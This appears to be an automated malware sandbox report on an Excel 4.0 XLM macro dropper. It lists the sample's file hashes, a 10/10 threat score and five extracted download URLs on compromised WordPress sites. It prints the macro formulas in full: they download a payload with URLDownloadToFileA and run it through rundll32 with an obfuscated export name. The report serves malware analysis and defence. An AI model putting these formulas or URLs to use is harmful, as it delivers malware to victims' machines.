General

  • Target

    e34976729e0020c199a1d202e8b669fe4c3177c46dff2af690e24e84ea74caf7

  • Size

    103KB

  • Sample

    241111-vl71xasdjf

  • MD5

    172f22a056537d74eed933a35a33efaa

  • SHA1

    b3dc4ea706f8edca034d3c9f721eef33ac49b9cb

  • SHA256

    e34976729e0020c199a1d202e8b669fe4c3177c46dff2af690e24e84ea74caf7

  • SHA512

    bf537fef12be6790c2831ef57ef7f6b6b8104e27341b87a02f3de28c941252422ba3d7ceb771986e22072f0a3feeef98be8fee5d49108267025d5a8dc510359a

  • SSDEEP

    3072:jHhRUVXHqu8hahYIfiQOVOveshVf4KwJQikmGox:DhRYXHrbtO8eOaDPk1ox

Score
10/10

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://landorestates.com/wordpress/NELf96wr/

https://www.rockwoodsaloon.com/wp-admin/A706GTXNufQSWXG52/

http://butziger.com/meettiming/hBJCeNGAvBpGZoD7ee/

https://teamsandeep.com/wp-content/p3f2n6wc4nwfg/

https://csinoticias.com/wp-includes/RnHjIzg/

Attributes
  • formulas

    =FORMULA() =TODO =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://landorestates.com/wordpress/NELf96wr/","..\wlw.ocx",0,0) =IF('TTGEHEHEHFHDG'!C15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.rockwoodsaloon.com/wp-admin/A706GTXNufQSWXG52/","..\wlw.ocx",0,0)) =IF('TTGEHEHEHFHDG'!C17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://butziger.com/meettiming/hBJCeNGAvBpGZoD7ee/","..\wlw.ocx",0,0)) =IF('TTGEHEHEHFHDG'!C19<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://teamsandeep.com/wp-content/p3f2n6wc4nwfg/","..\wlw.ocx",0,0)) =IF('TTGEHEHEHFHDG'!C21<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://csinoticias.com/wp-includes/RnHjIzg/","..\wlw.ocx",0,0)) =IF('TTGEHEHEHFHDG'!C23<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\rundll32.exe ..\wlw.ocx,D""&""l""&""lR""&""egister""&""Serve""&""r")

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://landorestates.com/wordpress/NELf96wr/

xlm40.dropper

https://www.rockwoodsaloon.com/wp-admin/A706GTXNufQSWXG52/

xlm40.dropper

http://butziger.com/meettiming/hBJCeNGAvBpGZoD7ee/

xlm40.dropper

https://teamsandeep.com/wp-content/p3f2n6wc4nwfg/

xlm40.dropper

https://csinoticias.com/wp-includes/RnHjIzg/

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://landorestates.com/wordpress/NELf96wr/

xlm40.dropper

https://www.rockwoodsaloon.com/wp-admin/A706GTXNufQSWXG52/

Targets

    • Target

      e34976729e0020c199a1d202e8b669fe4c3177c46dff2af690e24e84ea74caf7

    • Size

      103KB

    • MD5

      172f22a056537d74eed933a35a33efaa

    • SHA1

      b3dc4ea706f8edca034d3c9f721eef33ac49b9cb

    • SHA256

      e34976729e0020c199a1d202e8b669fe4c3177c46dff2af690e24e84ea74caf7

    • SHA512

      bf537fef12be6790c2831ef57ef7f6b6b8104e27341b87a02f3de28c941252422ba3d7ceb771986e22072f0a3feeef98be8fee5d49108267025d5a8dc510359a

    • SSDEEP

      3072:jHhRUVXHqu8hahYIfiQOVOveshVf4KwJQikmGox:DhRYXHrbtO8eOaDPk1ox

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

MITRE ATT&CK Enterprise v15

Tasks